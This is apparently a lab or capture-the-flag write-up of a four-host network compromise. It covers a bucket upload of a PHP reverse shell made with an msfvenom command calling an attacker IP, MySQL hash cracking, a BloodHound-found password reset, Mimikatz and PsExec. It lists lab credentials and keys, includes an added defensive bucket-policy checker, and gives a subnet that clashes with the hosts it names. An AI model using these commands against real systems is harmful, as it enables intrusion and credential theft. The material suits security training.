
Poseidon

Network

Given:

  • 192.168.192.0/24

Found:

  • 192.168.167.168 storage (linux)
  • 192.168.167.169 DC01
  • 192.168.167.170 MS01
  • 192.168.167.171 MS02

Creds

eric.wallows:EricLikesRunning800
jeff.borrows:naruto
administrator:BigFeast999! (local admin from .171)

john.doe:anthony
jane.smith:abc123
bob.johnson:butterfly
jeff.borrows:naruto
alice.williams:andrew
charlie.brown:tweety

other users:

John.Lark
Jane.Smith
Alice.Owal
Bob.Johnson

Enumeration

A ping sweep of the subnet finds four machines.

192.168.167.168 storage

Enumeration

With feroxbuster, we discover /storage.

The directory contains CSV files, which we can read with curl.

They yield four usernames.

This is an S3 bucket. Let's enumerate it.

We can upload objects, so we can try to upload a reverse shell.

msfvenom -p php/reverse_php LHOST=192.168.45.191 LPORT=6666 -o shell.php

192.168.167.170 MS01

Enumeration

Browsing to the service on the web server brings up a CloudSync login, and the provided credentials get us in.

Clicking "Sync Files."

Initial Access

Because the bucket this service syncs from has bad permissions, we upload a reverse shell to it; syncing then pulls the shell onto the web server.

Requesting the uploaded file triggers it, and we catch the connection with nc.
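As an added example (not from the writeup), here is a small checker for the kind of bucket misconfiguration abused above: a bucket policy or ACL that lets anonymous principals write objects into a bucket that a service later syncs into a web root. The sample policy and ACL are constructed, and the bucket name "storage" is illustrative.

```python
"""Flag S3 bucket policies and ACL grants that let anonymous principals write objects."""
import json

WRITE_ACTIONS = ("s3:putobject", "s3:put*", "s3:*", "*")
PUBLIC_GROUPS = ("http://acs.amazonaws.com/groups/global/AllUsers",
                 "http://acs.amazonaws.com/groups/global/AuthenticatedUsers")

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _is_anonymous(principal) -> bool:
    # Principal may be "*" or {"AWS": "*"} or {"AWS": ["*", ...]}
    if principal == "*":
        return True
    return isinstance(principal, dict) and any("*" in _as_list(p) for p in principal.values())

def public_write_statements(policy: dict) -> list:
    """Sids (or positional labels) of Allow statements granting object writes to everyone."""
    hits = []
    for i, st in enumerate(_as_list(policy.get("Statement", []))):
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        if st.get("Effect") == "Allow" and _is_anonymous(st.get("Principal")) \
                and any(a in WRITE_ACTIONS for a in actions):
            hits.append(st.get("Sid", f"statement[{i}]"))
    return hits

def public_write_acl_grants(acl: dict) -> list:
    """Grantee URIs of ACL grants giving WRITE or FULL_CONTROL to a public group."""
    return [g["Grantee"]["URI"] for g in acl.get("Grants", [])
            if g.get("Grantee", {}).get("Type") == "Group"
            and g["Grantee"].get("URI") in PUBLIC_GROUPS
            and g.get("Permission") in ("WRITE", "FULL_CONTROL")]

# Constructed sample data: a bucket policy document and an ACL in the shape `aws s3api get-bucket-acl` returns
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::storage/*"},
    {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:PutObject", "s3:DeleteObject"], "Resource": "arn:aws:s3:::storage/*"}
  ]
}""")
SAMPLE_ACL = {"Grants": [{"Grantee": {"Type": "Group", "URI": PUBLIC_GROUPS[0]},
                          "Permission": "WRITE"}]}

if __name__ == "__main__":
    print("public-write policy statements:", public_write_statements(SAMPLE_POLICY))  # ['PublicWrite']
    print("public-write ACL grants:", public_write_acl_grants(SAMPLE_ACL))
```

Any hit means untrusted parties can place files that the sync job will carry onto the web server, so the fix is to drop the public write grant and to have the sync job refuse executable content.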

Post Exploitation

Get the flag.

We can see AWS keys.

use Aws\S3\S3Client;

// S3 client configuration found in the CloudSync application source, with the access keys hardcoded
$s3Client = new S3Client([
    'version' => 'latest',
    'region'  => 'us-east-1',
    'endpoint' => $endpoint,
    'use_path_style_endpoint' => true,
    'credentials' => [
        'key'    => 'AWS_KEY_47dbe0d90dcd71eb6b371e75e5fe9bc5',
        'secret' => 'AWS_SECRET_26ebe67e93fbd2f9e906a85275cab135',
    ],
]);

And enumerate domain users.

Using that key and configuring an AWS CLI profile shows that it is a root account, but there is nothing inside.

We can access the MySQL database using root.

The cloudsync table has some users. Let's try to crack the passwords.

We recovered six.

john.doe:anthony
jane.smith:abc123
bob.johnson:butterfly
jeff.borrows:naruto
alice.williams:andrew
charlie.brown:tweety

We can use bloodhound-python to scout the AD.

Importing it into BloodHound shows that jeff.borrows has GenericAll over mario.lemieux.

Change Mario's password.

192.168.167.171 MS02

Enumeration

Initial Access

Using mario.lemieux and the new password.

Privilege Escalation

Mario has admin privileges, so we transfer Mimikatz and recover the administrator's credentials.

Log back in as administrator, entering the password interactively.

Post Exploitation

Get the flag.

192.168.167.169 DC01

Enumeration

Initial Access

Using the administrator credentials from MS02 (the account is a domain admin), run PsExec, entering the password interactively.

Post Exploitation

Get the flag.